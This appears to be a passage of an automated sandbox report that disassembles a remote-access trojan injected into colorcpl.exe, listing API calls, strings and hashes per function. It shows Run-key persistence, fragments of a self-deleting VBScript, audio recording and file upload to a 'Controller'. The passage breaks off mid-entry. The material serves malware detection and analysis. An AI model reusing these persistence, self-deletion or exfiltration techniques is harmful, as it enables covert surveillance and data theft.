                                                                                                                                • Part of subcall function 0467B978: GetCurrentProcessId.KERNEL32(00000000,75923530,00000000,?,?,?,?,046C6468,0466D20D,.vbs,?,?,?,?,?,046D52F0), ref: 0467B99F
                                                                                                                              • ShellExecuteW.SHELL32(00000000,open,00000000,046C6468,046C6468,00000000), ref: 0466D412
                                                                                                                              • ExitProcess.KERNEL32 ref: 0466D419
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: FileProcessTerminate$AttributesThread$CurrentDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                                                                                                              • String ID: ")$.vbs$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$pth_unenc$wend$while fso.FileExists("
                                                                                                                              • API String ID: 3797177996-3018399277
                                                                                                                              • Opcode ID: 93fd36f7d1289b7a0459bb9998584cfd6f10f3869c15e9ad0ac5197591090506
                                                                                                                              • Instruction ID: 388427bb8997fa8d0d40e1188d661909b37ef629d0df89ab81aecc08e5ab2aa9
                                                                                                                              • Opcode Fuzzy Hash: 93fd36f7d1289b7a0459bb9998584cfd6f10f3869c15e9ad0ac5197591090506
                                                                                                                              • Instruction Fuzzy Hash: C5819E716082405BE714FB60D8609FFB3E9AF96609F10082DA49793290FF74BD4DCB9A
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 04661A6D Relevance: 35.2, APIs: 16, Strings: 4, Instructions: 156fileCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 04661AD9
                                                                                                                              • WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000), ref: 04661B03
                                                                                                                              • WriteFile.KERNEL32(00000000,00000000,00000004,00000000,00000000), ref: 04661B13
                                                                                                                              • WriteFile.KERNEL32(00000000,WAVE,00000004,00000000,00000000), ref: 04661B23
                                                                                                                              • WriteFile.KERNEL32(00000000,fmt ,00000004,00000000,00000000), ref: 04661B33
                                                                                                                              • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 04661B43
                                                                                                                              • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 04661B54
                                                                                                                              • WriteFile.KERNEL32(00000000,046D2AAA,00000002,00000000,00000000), ref: 04661B65
                                                                                                                              • WriteFile.KERNEL32(00000000,046D2AAC,00000004,00000000,00000000), ref: 04661B75
                                                                                                                              • WriteFile.KERNEL32(00000000,00000001,00000004,00000000,00000000), ref: 04661B85
                                                                                                                              • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 04661B96
                                                                                                                              • WriteFile.KERNEL32(00000000,046D2AB6,00000002,00000000,00000000), ref: 04661BA7
                                                                                                                              • WriteFile.KERNEL32(00000000,data,00000004,00000000,00000000), ref: 04661BB7
                                                                                                                              • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 04661BC7
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: File$Write$Create
                                                                                                                              • String ID: RIFF$WAVE$data$fmt
                                                                                                                              • API String ID: 1602526932-4212202414
                                                                                                                              • Opcode ID: bfcb1411c92d6a56b85900c16d5e52d7bdd6736ef0b6821c6fa8a20f919f49e5
                                                                                                                              • Instruction ID: ae0ffc1ef60088c9b531cb3ff84eed2b9e4d10114aab414406cf0a20b2d80412
                                                                                                                              • Opcode Fuzzy Hash: bfcb1411c92d6a56b85900c16d5e52d7bdd6736ef0b6821c6fa8a20f919f49e5
                                                                                                                              • Instruction Fuzzy Hash: 28412B726443187BE310DA51DD86FBBBFECEB89B50F44041AF644D6080E7A4A909DBB3
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 04667270 Relevance: 35.1, APIs: 12, Strings: 8, Instructions: 62libraryloaderCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • GetModuleHandleW.KERNEL32(ntdll.dll,RtlInitUnicodeString,00000000,C:\Windows\SysWOW64\colorcpl.exe,00000001,0466764D,C:\Windows\SysWOW64\colorcpl.exe,00000003,04667675,046D52D8,046676CE), ref: 04667284
                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 0466728D
                                                                                                                              • GetModuleHandleW.KERNEL32(ntdll.dll,NtAllocateVirtualMemory), ref: 046672A2
                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 046672A5
                                                                                                                              • GetModuleHandleW.KERNEL32(ntdll.dll,NtFreeVirtualMemory), ref: 046672B6
                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 046672B9
                                                                                                                              • GetModuleHandleW.KERNEL32(ntdll.dll,RtlAcquirePebLock), ref: 046672CA
                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 046672CD
                                                                                                                              • GetModuleHandleW.KERNEL32(ntdll.dll,RtlReleasePebLock), ref: 046672DE
                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 046672E1
                                                                                                                              • GetModuleHandleW.KERNEL32(ntdll.dll,LdrEnumerateLoadedModules), ref: 046672F2
                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 046672F5
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: AddressHandleModuleProc
                                                                                                                              • String ID: C:\Windows\SysWOW64\colorcpl.exe$LdrEnumerateLoadedModules$NtAllocateVirtualMemory$NtFreeVirtualMemory$RtlAcquirePebLock$RtlInitUnicodeString$RtlReleasePebLock$ntdll.dll
                                                                                                                              • API String ID: 1646373207-2523923970
                                                                                                                              • Opcode ID: e40b1a0418caf209e43634e08688671bc02573ee06cbf5a676ef243fdb5846dd
                                                                                                                              • Instruction ID: b7f1b41af0856d31aea4bab986521cf6908549e0f0a89dd326f8fa73c4a23f36
                                                                                                                              • Opcode Fuzzy Hash: e40b1a0418caf209e43634e08688671bc02573ee06cbf5a676ef243fdb5846dd
                                                                                                                              • Instruction Fuzzy Hash: 2D0125E1E413166A9B116B7F9C58C176E9CDE60657309186BB406E2601FEBCE8008E74
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 046AF42D Relevance: 31.9, APIs: 17, Strings: 1, Instructions: 419COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: _free$EnvironmentVariable$_wcschr
                                                                                                                              • String ID: (]?
                                                                                                                              • API String ID: 3899193279-1886175342
                                                                                                                              • Opcode ID: f2be04c2da4be25cb0cf4194769c1237c180c8ea45bf2c1db49df1c449605f16
                                                                                                                              • Instruction ID: 35919782f756dc4552dfd51f99f37ad003e65d5ffb350034ab17e931781063cc
                                                                                                                              • Opcode Fuzzy Hash: f2be04c2da4be25cb0cf4194769c1237c180c8ea45bf2c1db49df1c449605f16
                                                                                                                              • Instruction Fuzzy Hash: 6BD12771E01B006BEB28EF78D8806A977A4EF15314F08416EE951E7381FB35BD218F96
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0466CDF9 Relevance: 28.2, APIs: 12, Strings: 4, Instructions: 203fileCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • _wcslen.LIBCMT ref: 0466CE07
                                                                                                                              • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00000000,?,046D50E4,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E), ref: 0466CE20
                                                                                                                              • CopyFileW.KERNEL32(C:\Windows\SysWOW64\colorcpl.exe,00000000,00000000,00000000,00000000,00000000,?,046D50E4,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe), ref: 0466CED0
                                                                                                                              • _wcslen.LIBCMT ref: 0466CEE6
                                                                                                                              • CreateDirectoryW.KERNEL32(00000000,00000000,00000000), ref: 0466CF6E
                                                                                                                              • CopyFileW.KERNEL32(C:\Windows\SysWOW64\colorcpl.exe,00000000,00000000), ref: 0466CF84
                                                                                                                              • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0466CFC3
                                                                                                                              • _wcslen.LIBCMT ref: 0466CFC6
                                                                                                                              • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0466CFDD
                                                                                                                              • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,046D50E4,0000000E), ref: 0466D02D
                                                                                                                              • ShellExecuteW.SHELL32(00000000,open,00000000,Function_00066468,Function_00066468,00000001), ref: 0466D04B
                                                                                                                              • ExitProcess.KERNEL32 ref: 0466D062
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: File$_wcslen$AttributesCopyCreateDirectory$CloseExecuteExitHandleProcessShell
                                                                                                                              • String ID: 6$C:\Windows\SysWOW64\colorcpl.exe$del$open
                                                                                                                              • API String ID: 1579085052-812158594
                                                                                                                              • Opcode ID: d2297d0e3a0070b1fe12704afaa9be39cca06b7ac76cd54be305515689dad577
                                                                                                                              • Instruction ID: 539cef2ffe09ab04e013f20aa4e4057fbe40798834ebcd196744ad5ced0bd46e
                                                                                                                              • Opcode Fuzzy Hash: d2297d0e3a0070b1fe12704afaa9be39cca06b7ac76cd54be305515689dad577
                                                                                                                              • Instruction Fuzzy Hash: 68519F707083406BFA08BB64D860ABE66DDAF9561EF40041DF54796280FF74FD4986AE
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0467C01B Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 139stringCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • lstrlenW.KERNEL32(?), ref: 0467C036
                                                                                                                              • _memcmp.LIBVCRUNTIME ref: 0467C04E
                                                                                                                              • lstrlenW.KERNEL32(?), ref: 0467C067
                                                                                                                              • FindFirstVolumeW.KERNEL32(?,00000104,?), ref: 0467C0A2
                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0467C0B5
                                                                                                                              • QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 0467C0F9
                                                                                                                              • lstrcmpW.KERNEL32(?,?), ref: 0467C114
                                                                                                                              • FindNextVolumeW.KERNEL32(?,0000003F,00000104), ref: 0467C12C
                                                                                                                              • _wcslen.LIBCMT ref: 0467C13B
                                                                                                                              • FindVolumeClose.KERNEL32(?), ref: 0467C15B
                                                                                                                              • GetLastError.KERNEL32 ref: 0467C173
                                                                                                                              • GetVolumePathNamesForVolumeNameW.KERNEL32(?,?,?,?), ref: 0467C1A0
                                                                                                                              • lstrcatW.KERNEL32(?,?), ref: 0467C1B9
                                                                                                                              • lstrcpyW.KERNEL32(?,?), ref: 0467C1C8
                                                                                                                              • GetLastError.KERNEL32 ref: 0467C1D0
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Volume$ErrorFindLast$lstrlen$CloseDeviceFirstNameNamesNextPathQuery_memcmp_wcslenlstrcatlstrcmplstrcpy
                                                                                                                              • String ID: ?
                                                                                                                              • API String ID: 3941738427-1684325040
                                                                                                                              • Opcode ID: 763898e265b4bd74b71d9b3c912ba5044e29eacb5c5bf581e94b0349d3fc8cf0
                                                                                                                              • Instruction ID: bef35aef48c9a2a5f95b39a469542da7ea2f60e721d4b8ddb43d56a305eac202
                                                                                                                              • Opcode Fuzzy Hash: 763898e265b4bd74b71d9b3c912ba5044e29eacb5c5bf581e94b0349d3fc8cf0
                                                                                                                              • Instruction Fuzzy Hash: A8414271608305ABDB20DF60E8489AB77ECFB95754F00092AF645D2250FB75EA88D7D2
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 04674D86 Relevance: 24.6, APIs: 9, Strings: 5, Instructions: 109libraryloaderCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 04674DD5
                                                                                                                              • LoadLibraryA.KERNEL32(?), ref: 04674E17
                                                                                                                              • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 04674E37
                                                                                                                              • FreeLibrary.KERNEL32(00000000), ref: 04674E3E
                                                                                                                              • LoadLibraryA.KERNEL32(?), ref: 04674E76
                                                                                                                              • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 04674E88
                                                                                                                              • FreeLibrary.KERNEL32(00000000), ref: 04674E8F
                                                                                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 04674E9E
                                                                                                                              • FreeLibrary.KERNEL32(00000000), ref: 04674EB5
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Library$AddressFreeProc$Load$DirectorySystem
                                                                                                                              • String ID: \ws2_32$\wship6$freeaddrinfo$getaddrinfo$getnameinfo
                                                                                                                              • API String ID: 2490988753-744132762
                                                                                                                              • Opcode ID: 78aa00b8c8b121d7db542bf5287c79f94fc1b2dc32dd2ee1363e7d3d578629c5
                                                                                                                              • Instruction ID: c4aba511e1e06db65a783eeb588a145e3479465b1fe19b9586ba1e03a55c8f7f
                                                                                                                              • Opcode Fuzzy Hash: 78aa00b8c8b121d7db542bf5287c79f94fc1b2dc32dd2ee1363e7d3d578629c5
                                                                                                                              • Instruction Fuzzy Hash: D231F3B1902715ABD321DF14D94CD9BB7E8EF85754F000A18F95493300FB34E9458BE6
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0467C68F Relevance: 23.0, APIs: 6, Strings: 7, Instructions: 214registryCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?), ref: 0467C6B1
                                                                                                                              • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0467C6F5
                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 0467C9BF
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: CloseEnumOpen
                                                                                                                              • String ID: DisplayName$DisplayVersion$InstallDate$InstallLocation$Publisher$Software\Microsoft\Windows\CurrentVersion\Uninstall$UninstallString
                                                                                                                              • API String ID: 1332880857-3714951968
                                                                                                                              • Opcode ID: a62c1dc30038dbf1401b081311f67b5ed2aaed8f5cc965cc380ab6e7a68f25c8
                                                                                                                              • Instruction ID: 3515125497f24e7e21b75387930942e08ec912c39ae54e3bede7b97105062011
                                                                                                                              • Opcode Fuzzy Hash: a62c1dc30038dbf1401b081311f67b5ed2aaed8f5cc965cc380ab6e7a68f25c8
                                                                                                                              • Instruction Fuzzy Hash: 0781DF711082459BE325EB60D850EEFB7E8FF95309F50492DA59A83150FF30B94DCB9A
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 06730139 Relevance: 22.9, APIs: 15, Instructions: 419COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443972597.00000000066E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 066E0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_66e0000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: _free$_wcschr
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 565560161-0
                                                                                                                              • Opcode ID: 12b2d8700cfafab1c51f31b0af1c60b5a90c67e430b3d12670f3d9796c815c4a
                                                                                                                              • Instruction ID: ad2ca33f9b7b80a14d5533dacaaea146294f8207d52011cd7c7e6da024c7b7e1
                                                                                                                              • Opcode Fuzzy Hash: 12b2d8700cfafab1c51f31b0af1c60b5a90c67e430b3d12670f3d9796c815c4a
                                                                                                                              • Instruction Fuzzy Hash: 35D14771D00335AFDBE4EF749D84A7E7BA8EF02324F04416EEA55A7282E7719540C794
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 046A5D56 Relevance: 22.8, APIs: 15, Instructions: 296COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: _free$Info
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2509303402-0
                                                                                                                              • Opcode ID: 500fa0793cac74136a762a197a71811c6e4bf8efe8828f0111bcd311a00253ab
                                                                                                                              • Instruction ID: 1eb156c5f14466b7f8e19f158e9ae20cd077fa575f14dcba9873f3fcd4c8fdfe
                                                                                                                              • Opcode Fuzzy Hash: 500fa0793cac74136a762a197a71811c6e4bf8efe8828f0111bcd311a00253ab
                                                                                                                              • Instruction Fuzzy Hash: 34B1BE71900A05AEEB21DF68C880BEEBBF4FF18304F18412DE595A7391E675AD95CF60
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 06726A62 Relevance: 21.3, APIs: 14, Instructions: 296COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443972597.00000000066E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 066E0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_66e0000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: _free
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 269201875-0
                                                                                                                              • Opcode ID: 5c7b1bf4f475568e38e69d940d0222fa4f9c7dd3754b5f784b0771feacd0cc66
                                                                                                                              • Instruction ID: 77cdba49fd42fe058cc930ca065022f1eb340aa33b278e8782ec1149ff2533c5
                                                                                                                              • Opcode Fuzzy Hash: 5c7b1bf4f475568e38e69d940d0222fa4f9c7dd3754b5f784b0771feacd0cc66
                                                                                                                              • Instruction Fuzzy Hash: 32B19E71D0026A9FDFA0DF68CC84BEEBBF5FF08700F24456AE595A7241DA35A845CB60
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 046B12C6 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • ___free_lconv_mon.LIBCMT ref: 046B130A
                                                                                                                                • Part of subcall function 046B0502: _free.LIBCMT ref: 046B051F
                                                                                                                                • Part of subcall function 046B0502: _free.LIBCMT ref: 046B0531
                                                                                                                                • Part of subcall function 046B0502: _free.LIBCMT ref: 046B0543
                                                                                                                                • Part of subcall function 046B0502: _free.LIBCMT ref: 046B0555
                                                                                                                                • Part of subcall function 046B0502: _free.LIBCMT ref: 046B0567
                                                                                                                                • Part of subcall function 046B0502: _free.LIBCMT ref: 046B0579
                                                                                                                                • Part of subcall function 046B0502: _free.LIBCMT ref: 046B058B
                                                                                                                                • Part of subcall function 046B0502: _free.LIBCMT ref: 046B059D
                                                                                                                                • Part of subcall function 046B0502: _free.LIBCMT ref: 046B05AF
                                                                                                                                • Part of subcall function 046B0502: _free.LIBCMT ref: 046B05C1
                                                                                                                                • Part of subcall function 046B0502: _free.LIBCMT ref: 046B05D3
                                                                                                                                • Part of subcall function 046B0502: _free.LIBCMT ref: 046B05E5
                                                                                                                                • Part of subcall function 046B0502: _free.LIBCMT ref: 046B05F7
                                                                                                                              • _free.LIBCMT ref: 046B12FF
                                                                                                                                • Part of subcall function 046A6782: RtlFreeHeap.NTDLL(00000000,00000000,?,046B0C6F,0000000A,00000000,0000000A,00000000,?,046B0F13,0000000A,00000007,0000000A,?,046B145E,0000000A), ref: 046A6798
                                                                                                                                • Part of subcall function 046A6782: GetLastError.KERNEL32(0000000A,?,046B0C6F,0000000A,00000000,0000000A,00000000,?,046B0F13,0000000A,00000007,0000000A,?,046B145E,0000000A,0000000A), ref: 046A67AA
                                                                                                                              • _free.LIBCMT ref: 046B1321
                                                                                                                              • _free.LIBCMT ref: 046B1336
                                                                                                                              • _free.LIBCMT ref: 046B1341
                                                                                                                              • _free.LIBCMT ref: 046B1363
                                                                                                                              • _free.LIBCMT ref: 046B1376
                                                                                                                              • _free.LIBCMT ref: 046B1384
                                                                                                                              • _free.LIBCMT ref: 046B138F
                                                                                                                              • _free.LIBCMT ref: 046B13C7
                                                                                                                              • _free.LIBCMT ref: 046B13CE
                                                                                                                              • _free.LIBCMT ref: 046B13EB
                                                                                                                              • _free.LIBCMT ref: 046B1403
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 161543041-0
                                                                                                                              • Opcode ID: 6d08e8a9b2681a5056c8d838ef04c9ca87451fce7365e1dd05852828d4870d72
                                                                                                                              • Instruction ID: 1c9e784393552e6dc356b850e2a7d5fda3fecea842d7b37f94ba3099c3a95735
                                                                                                                              • Opcode Fuzzy Hash: 6d08e8a9b2681a5056c8d838ef04c9ca87451fce7365e1dd05852828d4870d72
                                                                                                                              • Instruction Fuzzy Hash: 85316A31600700AAEB21AA39D884BDA77E8EB12395F54851DE0E8D6660FE31FDD08B94
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 06731FD2 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • _free.LIBCMT ref: 0673200B
                                                                                                                              • ___free_lconv_mon.LIBCMT ref: 06732016
                                                                                                                                • Part of subcall function 0673120E: _free.LIBCMT ref: 0673122B
                                                                                                                                • Part of subcall function 0673120E: _free.LIBCMT ref: 0673123D
                                                                                                                                • Part of subcall function 0673120E: _free.LIBCMT ref: 0673124F
                                                                                                                                • Part of subcall function 0673120E: _free.LIBCMT ref: 06731261
                                                                                                                                • Part of subcall function 0673120E: _free.LIBCMT ref: 06731273
                                                                                                                                • Part of subcall function 0673120E: _free.LIBCMT ref: 06731285
                                                                                                                                • Part of subcall function 0673120E: _free.LIBCMT ref: 06731297
                                                                                                                                • Part of subcall function 0673120E: _free.LIBCMT ref: 067312A9
                                                                                                                                • Part of subcall function 0673120E: _free.LIBCMT ref: 067312BB
                                                                                                                                • Part of subcall function 0673120E: _free.LIBCMT ref: 067312CD
                                                                                                                                • Part of subcall function 0673120E: _free.LIBCMT ref: 067312DF
                                                                                                                                • Part of subcall function 0673120E: _free.LIBCMT ref: 067312F1
                                                                                                                                • Part of subcall function 0673120E: _free.LIBCMT ref: 06731303
                                                                                                                              • _free.LIBCMT ref: 0673202D
                                                                                                                              • _free.LIBCMT ref: 06732042
                                                                                                                              • _free.LIBCMT ref: 0673204D
                                                                                                                              • _free.LIBCMT ref: 0673206F
                                                                                                                              • _free.LIBCMT ref: 06732082
                                                                                                                              • _free.LIBCMT ref: 06732090
                                                                                                                              • _free.LIBCMT ref: 0673209B
                                                                                                                              • _free.LIBCMT ref: 067320D3
                                                                                                                              • _free.LIBCMT ref: 067320DA
                                                                                                                              • _free.LIBCMT ref: 067320F7
                                                                                                                              • _free.LIBCMT ref: 0673210F
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443972597.00000000066E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 066E0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_66e0000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: _free$___free_lconv_mon
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3658870901-0
                                                                                                                              • Opcode ID: 9bfda5629608ba7fc19c0d50907ac959002cc076efa33527145bad7316b2b0bb
                                                                                                                              • Instruction ID: 6545988c6b3b19ecd39166bf90e077a137483014b7a9c7bcfea008e444dcce98
                                                                                                                              • Opcode Fuzzy Hash: 9bfda5629608ba7fc19c0d50907ac959002cc076efa33527145bad7316b2b0bb
                                                                                                                              • Instruction Fuzzy Hash: D3319131A14229AFDBF4AB39DE48B66B7E9EF00310F208519E578D7552DF31E988CB11
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 04668B7A Relevance: 19.6, APIs: 8, Strings: 3, Instructions: 328fileCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,000000B6), ref: 04668CE3
                                                                                                                              • GetFileSizeEx.KERNEL32(00000000,?), ref: 04668D1B
                                                                                                                              • __aulldiv.LIBCMT ref: 04668D4D
                                                                                                                                • Part of subcall function 04664AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 04664B36
                                                                                                                                • Part of subcall function 0467B4EF: GetLocalTime.KERNEL32(00000000), ref: 0467B509
                                                                                                                              • SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 04668E70
                                                                                                                              • ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 04668E8B
                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 04668F64
                                                                                                                              • CloseHandle.KERNEL32(00000000,00000052), ref: 04668FAE
                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 04668FFC
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: File$CloseHandle$CreateLocalPointerReadSizeTime__aulldivsend
                                                                                                                              • String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller:
                                                                                                                              • API String ID: 3086580692-2596673759
                                                                                                                              • Opcode ID: 7e31a1b9496086b86598ee154c2d6726d767bb8b3f03f579ec5e5891024cf6dd
                                                                                                                              • Instruction ID: 9e120042b8d9ca4c8cc761da8514ea1aa35ee082a8f0cedcb6dba83dd565f7ba
